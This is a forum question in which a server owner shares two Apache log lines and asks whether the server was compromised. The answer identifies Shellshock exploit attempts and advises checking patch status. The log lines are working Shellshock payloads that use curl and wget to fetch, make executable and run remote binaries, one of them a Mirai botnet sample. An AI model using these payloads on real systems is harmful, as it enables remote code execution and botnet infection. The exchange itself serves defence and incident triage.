Apache logs show commands execution

Question

I am wondering if my server is compromised or not. I just looked at my log and seen the following line in there:

IP: 173.249.4.160, Date: 27-12-17, Time:09:52:51, Browser: () { :;}; /bin/bash -c "curl -o /tmp/zmuie http://162.243.117.130/zmuie;/usr/bin/wget http://162.243.117.130/zmuie -O /tmp/zmuie;wget http://162.243.117.130/zmuie -O /dev/shm/zmuie;chmod +x /dev/shm/zmuie /tmp/zmuie;/dev/shm/zmuie;/tmp/zmuie;rm -rf /dev/shm/zmuie /tmp/zmuie*"
IP: 183.90.60.51, Date: 28-12-17, Time:06:13:07, Browser: () { :; }; /bin/sh -c 'wget http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -O /dev/null;wget1 http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -O /dev/null;curl http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -o /dev/null;/usr/sfwbin/wget http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin;fetch -/dev/null http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin'

I am not sure if they were able to execute that command successfully or not. I shut my server off.

Answer 1

While one can see from the server log that an exploit was attempted using the Shellshock vulnerability it is impossible to say based on this log alone if the exploit was successful.

Your first check should probably be to find out if your system is vulnerable against this kind of exploit at all. This should not be the case if your system has current updates. If your system is vulnerable then you should treat it as compromised, no matter if from the recent exploit attempts or from older attempts since the bug is known and exploited for a long time.